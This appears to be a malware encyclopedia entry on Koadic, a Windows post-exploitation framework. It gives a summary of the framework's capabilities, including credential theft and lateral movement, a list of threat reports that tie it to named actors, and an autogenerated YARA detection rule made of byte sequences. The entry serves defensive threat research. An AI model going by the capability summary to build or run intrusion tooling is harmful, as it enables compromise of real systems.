SYMBOLCOMMON_NAMEaka. SYNONYMS
win.koadic (Back to overview)

Koadic

Actor(s): APT28, Stone Panda

VTCollection    

Koadic is an open-source post-exploitation framework for Windows, created by zerosum0x0 and available on GitHub. The framework is written in Python and can generate JScript and VBScript payloads which can be written to disk or mapped directly into memory. Its capabilities include remote desktop access, command execution, lateral movement via SMB, file transfer, credential theft using Mimikatz, port scanning, and system information collection. It can also collect specific system information and targeted files based on their name or extension.

References
2024-01-25JSAC 2024Masafumi Takeda, Tomoya Furukawa
Threat Intelligence of Abused Public Post-Exploitation Frameworks
AsyncRAT DCRat Empire Downloader GRUNT Havoc Koadic Merlin PoshC2 Quasar RAT Sliver
2021-03-18PRODAFT Threat IntelligencePRODAFT
SilverFish GroupThreat Actor Report
Cobalt Strike Dridex Koadic
2021-02-24MalwarebytesHossein Jazi
LazyScripter: From Empire to double RAT
Octopus Koadic
2021-01-13AlienVaultTom Hegel
A Global Perspective of the SideWinder APT
8.t Dropper Koadic SideWinder
2021-01-01SecureWorks
Threat Profile: GOLD DRAKE
Cobalt Strike Dridex FriedEx Koadic MimiKatz WastedLocker Evil Corp
2020-11-28pat_h/to/filepat_h/to/file
Hunting Koadic Pt. 2 - JARM Fingerprinting
Koadic
2020-03-20BitdefenderLiviu Arsene
5 Times More Coronavirus-themed Malware Reports during March
ostap HawkEye Keylogger Koadic Loki Password Stealer (PWS) Nanocore RAT Remcos
2020-01-09Github (zerosum0x0)zerosum0x0
Koadic
Koadic
2020-01-01SecureworksSecureWorks
COBALT TRINITY
POWERTON pupy Imminent Monitor RAT Koadic Nanocore RAT NetWire RC PoshC2 APT33
2020-01-01SecureworksSecureWorks
GOLD DRAKE
Dridex Empire Downloader FriedEx Koadic MimiKatz
2020-01-01SecureworksSecureWorks
COBALT ULSTER
POWERSTATS Koadic MuddyWater
2018-06-06Palo Alto Networks Unit 42Bryan Lee, Robert Falcone
Sofacy Group’s Parallel Attacks
Koadic Zebrocy
Yara Rules
[TLP:WHITE] win_koadic_auto (20230808 | Detects win.koadic.)
rule win_koadic_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2023-12-06"
        version = "1"
        description = "Detects win.koadic."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic"
        malpedia_rule_date = "20231130"
        malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
        malpedia_version = "20230808"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using YARA-Signator.
     * The code and documentation is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { 0f84b4020000 53 56 57 8b7c2424 bb01000000 83ffff }
            // n = 7, score = 100
            //   0f84b4020000         | je                  0x2ba
            //   53                   | push                ebx
            //   56                   | push                esi
            //   57                   | push                edi
            //   8b7c2424             | mov                 edi, dword ptr [esp + 0x24]
            //   bb01000000           | mov                 ebx, 1
            //   83ffff               | cmp                 edi, -1

        $sequence_1 = { 035c2408 53 58 e8???????? a3???????? 8b5c2414 035c2408 }
            // n = 7, score = 100
            //   035c2408             | add                 ebx, dword ptr [esp + 8]
            //   53                   | push                ebx
            //   58                   | pop                 eax
            //   e8????????           |                     
            //   a3????????           |                     
            //   8b5c2414             | mov                 ebx, dword ptr [esp + 0x14]
            //   035c2408             | add                 ebx, dword ptr [esp + 8]

        $sequence_2 = { 83fb01 0f8da9000000 8b542404 ff35???????? e8???????? 8b15???????? }
            // n = 6, score = 100
            //   83fb01               | cmp                 ebx, 1
            //   0f8da9000000         | jge                 0xaf
            //   8b542404             | mov                 edx, dword ptr [esp + 4]
            //   ff35????????         |                     
            //   e8????????           |                     
            //   8b15????????         |                     

        $sequence_3 = { 50 8d4c2420 51 e8???????? e9???????? 6a08 }
            // n = 6, score = 100
            //   50                   | push                eax
            //   8d4c2420             | lea                 ecx, [esp + 0x20]
            //   51                   | push                ecx
            //   e8????????           |                     
            //   e9????????           |                     
            //   6a08                 | push                8

        $sequence_4 = { 3b1c24 7527 8b15???????? ff35???????? e8???????? 8d05c8334100 50 }
            // n = 7, score = 100
            //   3b1c24               | cmp                 ebx, dword ptr [esp]
            //   7527                 | jne                 0x29
            //   8b15????????         |                     
            //   ff35????????         |                     
            //   e8????????           |                     
            //   8d05c8334100         | lea                 eax, [0x4133c8]
            //   50                   | push                eax

        $sequence_5 = { 72f1 eb07 8b34c5c4124100 8bc6 8d5001 }
            // n = 5, score = 100
            //   72f1                 | jb                  0xfffffff3
            //   eb07                 | jmp                 9
            //   8b34c5c4124100       | mov                 esi, dword ptr [eax*8 + 0x4112c4]
            //   8bc6                 | mov                 eax, esi
            //   8d5001               | lea                 edx, [eax + 1]

        $sequence_6 = { 7507 c7450c02104100 53 56 8b7508 f6462c01 57 }
            // n = 7, score = 100
            //   7507                 | jne                 9
            //   c7450c02104100       | mov                 dword ptr [ebp + 0xc], 0x411002
            //   53                   | push                ebx
            //   56                   | push                esi
            //   8b7508               | mov                 esi, dword ptr [ebp + 8]
            //   f6462c01             | test                byte ptr [esi + 0x2c], 1
            //   57                   | push                edi

        $sequence_7 = { 50 68???????? ff35???????? e8???????? 21c0 7414 ff35???????? }
            // n = 7, score = 100
            //   50                   | push                eax
            //   68????????           |                     
            //   ff35????????         |                     
            //   e8????????           |                     
            //   21c0                 | and                 eax, eax
            //   7414                 | je                  0x16
            //   ff35????????         |                     

        $sequence_8 = { e8???????? 890424 6800000000 e8???????? a3???????? ff35???????? ff742404 }
            // n = 7, score = 100
            //   e8????????           |                     
            //   890424               | mov                 dword ptr [esp], eax
            //   6800000000           | push                0
            //   e8????????           |                     
            //   a3????????           |                     
            //   ff35????????         |                     
            //   ff742404             | push                dword ptr [esp + 4]

        $sequence_9 = { ff15???????? 8b542434 81c200000800 89542428 eb04 8b5c2414 8b442434 }
            // n = 7, score = 100
            //   ff15????????         |                     
            //   8b542434             | mov                 edx, dword ptr [esp + 0x34]
            //   81c200000800         | add                 edx, 0x80000
            //   89542428             | mov                 dword ptr [esp + 0x28], edx
            //   eb04                 | jmp                 6
            //   8b5c2414             | mov                 ebx, dword ptr [esp + 0x14]
            //   8b442434             | mov                 eax, dword ptr [esp + 0x34]

    condition:
        7 of them and filesize < 180224
}
Download all Yara Rules